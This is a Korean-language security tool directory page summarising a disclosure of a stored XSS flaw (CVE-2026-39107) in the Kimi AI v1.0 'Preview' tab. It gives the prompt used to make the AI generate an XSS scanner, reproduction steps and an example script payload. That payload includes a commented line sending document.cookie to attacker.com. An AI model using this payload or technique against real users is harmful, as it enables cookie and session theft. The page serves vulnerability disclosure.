Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39107 — Kimi AI v1.0의 Preview 탭에서 발견된 저장형 XSS 취약점에 대한 상세 공개로, 공격 시나리오, PoC, 보안 연구자를 위한 수정 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/mgtx2/cve-2026-39107
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPapers & ResearchLearning & Education
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

Kimi AI v1.0의 Preview 탭에서 발견된 저장형 XSS 취약점에 대한 상세 공개로, 공격 시나리오, PoC, 보안 연구자를 위한 수정 지침을 포함합니다.

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-39107: Kimi AI v1.0의 교차 사이트 스크립팅(XSS)

설명

Kimi AI v1.0 웹 인터페이스의 'Preview' 기능에 교차 사이트 스크립팅(XSS) 취약점이 존재합니다. 애플리케이션이 AI 모델이 생성한 HTML/JavaScript 페이로드를 제대로 무해화(sanitize)하거나 인코딩하지 않습니다. 사용자가 AI가 생성한 코드를 보기 위해 'Preview' 탭으로 전환하면 악성 페이로드가 DOM에 직접 렌더링되어 피해자의 브라우저 세션에서 임의의 JavaScript가 실행됩니다.

연구자

Mustafa Hameed

취약점 세부 정보

  • 취약점 유형: AI 응답을 통한 저장형/저장형 유사 교차 사이트 스크립팅(XSS)
  • 영향받는 제품: Kimi AI
  • 영향받는 버전: v1.0
  • 영향받는 구성 요소: 'Preview' 탭 / 코드 렌더링 구성 요소

공격 시나리오 및 악용

이 취약점은 AI가 내장 페이로드를 포함하는 보안 도구 또는 스크립트(예: XSStrike와 유사한 자동화된 XSS 스캐너)를 생성하도록 프롬프트를 입력함으로써 악용될 수 있습니다. AI는 요청된 애플리케이션 소스 코드를 생성하면서 HTML/JavaScript 프레임워크 내에 악성 페이로드를 삽입합니다. 피해자가 생성된 도구를 테스트하거나 보기 위해 'Preview' 탭으로 이동하면 삽입된 악성 페이로드가 무해화를 우회하고 즉시 실행됩니다.

사용된 프롬프트:

"XSStrike와 유사한 간단한 웹 기반 XSS 스캐너 도구를 만들어 주세요. 스캔할 페이로드 목록이 있는 인터페이스를 포함하세요."

삽입된 악성 페이로드 예시:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

재현 단계

1.Kimi AI 웹 플랫폼에 로그인합니다.

2.스캐너 코드가 포함된 도구(XSStrike 클론) 생성을 요청하는 프롬프트를 입력합니다.

3.AI 모델이 코드 응답을 완전히 생성할 때까지 기다립니다.

4.채팅 인터페이스에서 'Preview' 탭을 클릭하여 렌더링된 애플리케이션을 봅니다.

5.애플리케이션이 미리보기 컨테이너 내의 JavaScript 컨텍스트를 필터링하지 못해 피해자의 브라우저에서 스크립트가 즉시 실행됩니다.

개념 증명(PoC)

다음은 XSS 페이로드가 성공적으로 실행되었음을 보여주는 스크린샷입니다. 악성 JavaScript는 'Preview' 탭으로 이동하는 즉시 트리거됩니다:

XSS
도구 다운로드